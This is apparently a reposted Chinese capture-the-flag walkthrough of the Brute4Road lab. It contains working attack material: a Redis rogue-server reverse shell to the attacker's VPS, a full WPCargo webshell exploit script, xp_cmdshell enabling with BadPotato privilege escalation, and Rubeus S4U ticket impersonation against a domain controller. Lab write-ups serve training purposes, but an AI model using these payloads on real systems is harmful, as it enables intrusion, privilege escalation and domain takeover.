WP-春秋云镜-Brute4Road靶场通关完全指南

2024-02-12 02:30
文章标签 靶场 指南 完全 wp 通关 云镜 春秋 brute4road

本文主要是介绍WP-春秋云镜-Brute4Road靶场通关完全指南,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

Flag1

废话不多说,开启靶场给了个IP
Fscan扫一波
发现了Redis未授权,之前写过一篇文章阐述过Redis未授权的四种利用方式
Redis未授权四种利用方式
在这里插入图片描述在这里插入图片描述先使用写入ssh认证方式看是否可以写入
config set dir /root/.ssh
提示权限不够,则直接考虑主从模式获取rce
这里使用redis-rogue-server获取rce

git clone https://github.com/n0b0dyCN/redis-rogue-server.git
python3 redis-rogue-server.py --rhost 47.92.212.201 --lhost 38.47.100.xxxx # lhost是你vps的地址

在这里插入图片描述
上图注释掉的是vps地址,监听8888端口,然后在弹回的shell执行python伪终端
python -c ‘import pty; pty.spawn(“/bin/bash”)’
在这里插入图片描述
成功获取shell
在redis目录下发现了flag01,但是查看权限不够,需要提权
在这里插入图片描述

find / -user root -perm -4000 -print 2>/dev/null

在这里插入图片描述发现base64存在root权限
在这里插入图片描述
flag01: flag{2eca9677-7e51-49be-a0b3-axxxxxxx}

flag02

传frp,将流量代出来

在这里插入图片描述挂全局代理
在这里插入图片描述对172.22段进行扫描
在这里插入图片描述看结果,有两个kennel可以利用,mssql和wordpress
使用wpscan扫描wordpress站点
发现公开漏洞
https://wpscan.com/vulnerability/5c21ad35-b2fb-4a51-858f-8ffff685de4a

import sysimport binasciiimport requests# This is a magic string that when treated as pixels and compressed using the png# algorithm, will cause <?=$_GET[1]($_POST[2]);?> to be written to the png filepayload = '2f49cf97546f2c24152b216712546f112e29152b1967226b6f5f50'def encode_character_code(c: int):return '{:08b}'.format(c).replace('0', 'x')text = ''.join([encode_character_code(c) for c in binascii.unhexlify(payload)])[1:]destination_url = 'http://172.22.2.18/'cmd = 'ls'# With 1/11 scale, '1's will be encoded as single white pixels, 'x's as single black pixels.requests.get(f"{destination_url}wp-content/plugins/wpcargo/includes/barcode.php?text={text}&sizefactor=.090909090909&size=1&filepath=/var/www/html/webshell.php")# We have uploaded a webshell - now let's use it to execute a command.print(requests.post(f"{destination_url}webshell.php?1=system", data={"2": cmd}).content.decode('ascii', 'ignore'))

写入webshell
在这里插入图片描述在这里插入图片描述查看数据库配置文件
在这里插入图片描述连接数据库获得flag2
在这里插入图片描述

flag03

在上一个数据库中发现了password字典,把字典拉下来,用来爆破下mssql
暴力破解获得了mssql的账户密码

在这里插入图片描述连接进入,打开xp_cmdshell

select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell' #返回1即存在
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE; #启用cmdshell
exec master..xp_cmdshell 'whoami' #执行命令

在这里插入图片描述Ladon48.exe BadPotato “whoami” #提权
在这里插入图片描述创建新用户
在这里插入图片描述C:/迅雷下载/Ladon48.exe BadPotato "net localgroup administrators test /add" # 加到管理组
远程桌面连接进入
在这里插入图片描述

在administrators目录下发现flag03
在这里插入图片描述

flag04

进行信息收集,发现存在域
在这里插入图片描述
ping域即可定位域控在172.22.2.3
在这里插入图片描述上mimikatz读密码
看是否可以读到域用户密码

在这里插入图片描述使用Rubeus申请访问自身的可转发服务票据
.\Rubeus.exe asktgt /user:MSSQLSERVER$ /rc4:bd2cf5e6a8f89ed5b02d3d7fcf5e88c7 /domain:xiaorang.lab /dc:DC.xiaorang.lab /nowrap > 1.txt
在这里插入图片描述

通过Rubeus的S4U2Self协议代表域管理员申请针对域控LDAP服务的票据并注入内存
.\Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:CIFS/DC.xiaorang.lab /dc:DC.xiaorang.lab /ptt /ticket:doIFmjCCBZagAwIBBaEDAgEWooIEqzCCBKdhggSjMIIEn6ADAgEFoQ4bDFhJQU9SQU5HLkxBQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMeGlhb3JhbmcubGFio4IEYzCCBF+gAwIBEqEDAgECooIEUQSCBE1AkncvWu9Oq61AalKFDmotwRbaGa1WWfrl3/5ylhbJrec4y9oTKUHqv2FndcyFONaFAAx3HiYxOUKQgOhNA+U2OgZHS6TjsAnpoK4Z0kMmFKRWy7gPWyUpC2x0vxSHXRvp1nwSVeupp6Ky5aAn7qwQpZ+73V0Vvrih0iNc3QfPHDU2TAVOBue5BCdbFIwg6qW/4fubvq5kYGutWAppskvt6kTIIVgBobF+ngdNsouAT4QIIqUT0ok/Oepw6UpY56DSwwydOkzoUX7Jzx6V+ddRKFB7PJDejSvnxoi95D+QKSCsq7cFyerZUYTTfFf6vp2fEYeNlfHRo/kdpNPKcGGK+lrV6FA/F0PhtXdc2eWY4TKL8cZ1qwlKiZocDyXk0ZYBeEzT3PdhZNw5FQFRnYi47eVgi9/zTXZ/vgRgL9QWlp5WkAcebgJmkjWhc2I3RXmJJlxgQxufVjG6PRi1b6kOa0evnYVCFs9qAOPkBti8YMqVeSfvseu8BVqQfMEVCa1Tb9zo5XJ6ej3nI5zJkLSkO1ZLgw7qd9bsLxzi0RGQLqc03ZYsYIIKuMPfp0E+pB1cjQwDOBdUbru/zOGzJ7w9kgp7bUHex2V+4rtHwNPGmVgfiHCV+qSXTIADhWbbpenZi48CtTETS0iqNw3Z/kN0+vD1HbwduDP6HK9Bro/gzbJ640gksqQUhpCTGPSlkexam5z2af3hivn6XYwHgTnXtq7N1JKY7+jKV0qn2QkVL/SBr/I7j/WNg6Ffqr10eBdNlfQqpvlYBt1lIfp/4avyWo6zacie6zp3+i7ZSl9UA5lhlkpkZpl14wlGGZgw2fbaRce3E9j/HOHfg8LcBQGAnV0BrPWd/EZCkXU42TzGIZVAm38WLmQB9e40LVgkPTRiJi091pxuRlIVHZDIg7UepmLRIo3Vv/Js1d2x/hfXiXoqHq+BKDyVZbx7U76heewAp/1UUTLE8+A0jUV63tjM/uz9kR/qaKDjBbWGeXWMHjlw9m6fBd4n0WgzZIXVQurDcfs7ZjGZbIApAI414UN8AdERD0HPCMa99qRF0un2MLfwFP3aptuSdau3qPK6PkgBrBTJSEBsq5hwddRlxJPnTjkM8iIn4G9dvrWZdENeBHBPVDg6f0gfoNqswaOMYZSVqBc9csdZ3ZD6XsCOu/80cVgWKrNOvXsjVGjUfXMKyid+O9FavYrSMMFqg6XlIjA3aRZ1frSxAj9dowz2zoK+bh/NmxFSlaQ9Yxe94HViw5UlDwAxxlezIyCJsCXdMZjlM1+qPVaJ9D/1ko/STJ5zZhhnWgncH5HA71IamhCa7UDTVZhdSr3EmvOIvyHzO8DICPcMgJ/Qw6MxPmjoLg68PnFqrsg9qFVtGkk32e+rEQneZd7YjJSIHR5Z0Mnt31rNquvprsjWuXJLaQyH33iaKyIZZifKU8LMVeQQ1nJF5NiZNdEi9Cgg9r5SuHWjgdowgdegAwIBAKKBzwSBzH2ByTCBxqCBwzCBwDCBvaAbMBmgAwIBF6ESBBDrHzkTjelV3zTu2oS5aKgSoQ4bDFhJQU9SQU5HLkxBQqIZMBegAwIBAaEQMA4bDE1TU1FMU0VSVkVSJKMHAwUAQOEAAKURGA8yMDIzMDEwMzA5NTczMFqmERgPMjAyMzAxMDMxOTU3MzBapxEYDzIwMjMwMTEwMDk1NzMwWqgOGwxYSUFPUkFORy5MQUKpITAfoAMCAQKhGDAWGwZrcmJ0Z3QbDHhpYW9yYW5nLmxhYg==
在这里插入图片描述
之后执行
type \\DC.xiaorang.lab\C$\Users\Administrator\flag\flag04.txt
即可看见flag04
在这里插入图片描述

这篇关于WP-春秋云镜-Brute4Road靶场通关完全指南的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!


http://www.chinasem.cn/article/701450

相关文章

SpringBoot请求参数接收控制指南分享

SpringBoot请求参数接收控制指南分享

《SpringBoot请求参数接收控制指南分享》:本文主要介绍SpringBoot请求参数接收控制指南,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教... 目录Spring Boot 请求参数接收控制指南1. 概述2. 有注解时参数接收方式对比3. 无注解时接收参数默认位置
阅读更多...
CentOS7更改默认SSH端口与配置指南

CentOS7更改默认SSH端口与配置指南

《CentOS7更改默认SSH端口与配置指南》SSH是Linux服务器远程管理的核心工具,其默认监听端口为22,由于端口22众所周知,这也使得服务器容易受到自动化扫描和暴力破解攻击,本文将系统性地介绍... 目录引言为什么要更改 SSH 默认端口?步骤详解:如何更改 Centos 7 的 SSH 默认端口1
阅读更多...
SpringBoot多数据源配置完整指南

SpringBoot多数据源配置完整指南

《SpringBoot多数据源配置完整指南》在复杂的企业应用中,经常需要连接多个数据库,SpringBoot提供了灵活的多数据源配置方式,以下是详细的实现方案,需要的朋友可以参考下... 目录一、基础多数据源配置1. 添加依赖2. 配置多个数据源3. 配置数据源Bean二、JPA多数据源配置1. 配置主数据
阅读更多...
python中各种常见文件的读写操作与类型转换详细指南

python中各种常见文件的读写操作与类型转换详细指南

《python中各种常见文件的读写操作与类型转换详细指南》这篇文章主要为大家详细介绍了python中各种常见文件(txt,xls,csv,sql,二进制文件)的读写操作与类型转换,感兴趣的小伙伴可以跟... 目录1.文件txt读写标准用法1.1写入文件1.2读取文件2. 二进制文件读取3. 大文件读取3.1
阅读更多...
SpringBoot中配置Redis连接池的完整指南

SpringBoot中配置Redis连接池的完整指南

《SpringBoot中配置Redis连接池的完整指南》这篇文章主要为大家详细介绍了SpringBoot中配置Redis连接池的完整指南,文中的示例代码讲解详细,具有一定的借鉴价值,感兴趣的小伙伴可以... 目录一、添加依赖二、配置 Redis 连接池三、测试 Redis 操作四、完整示例代码(一)pom.
阅读更多...
Linux内核参数配置与验证详细指南

Linux内核参数配置与验证详细指南

《Linux内核参数配置与验证详细指南》在Linux系统运维和性能优化中,内核参数(sysctl)的配置至关重要,本文主要来聊聊如何配置与验证这些Linux内核参数,希望对大家有一定的帮助... 目录1. 引言2. 内核参数的作用3. 如何设置内核参数3.1 临时设置(重启失效)3.2 永久设置(重启仍生效
阅读更多...
Python列表去重的4种核心方法与实战指南详解

Python列表去重的4种核心方法与实战指南详解

《Python列表去重的4种核心方法与实战指南详解》在Python开发中,处理列表数据时经常需要去除重复元素,本文将详细介绍4种最实用的列表去重方法,有需要的小伙伴可以根据自己的需要进行选择... 目录方法1:集合(set)去重法(最快速)方法2:顺序遍历法(保持顺序)方法3:副本删除法(原地修改)方法4:
阅读更多...
PyInstaller打包selenium-wire过程中常见问题和解决指南

PyInstaller打包selenium-wire过程中常见问题和解决指南

《PyInstaller打包selenium-wire过程中常见问题和解决指南》常用的打包工具PyInstaller能将Python项目打包成单个可执行文件,但也会因为兼容性问题和路径管理而出现各种运... 目录前言1. 背景2. 可能遇到的问题概述3. PyInstaller 打包步骤及参数配置4. 依赖
阅读更多...
Nginx中配置HTTP/2协议的详细指南

Nginx中配置HTTP/2协议的详细指南

《Nginx中配置HTTP/2协议的详细指南》HTTP/2是HTTP协议的下一代版本,旨在提高性能、减少延迟并优化现代网络环境中的通信效率,本文将为大家介绍Nginx配置HTTP/2协议想详细步骤,需... 目录一、HTTP/2 协议概述1.HTTP/22. HTTP/2 的核心特性3. HTTP/2 的优
阅读更多...
在React中引入Tailwind CSS的完整指南

在React中引入Tailwind CSS的完整指南

《在React中引入TailwindCSS的完整指南》在现代前端开发中,使用UI库可以显著提高开发效率,TailwindCSS是一个功能类优先的CSS框架,本文将详细介绍如何在Reac... 目录前言一、Tailwind css 简介二、创建 React 项目使用 Create React App 创建项目
阅读更多...

Copyright China编程 23002807@qq.com

沪ICP备2023033072号-2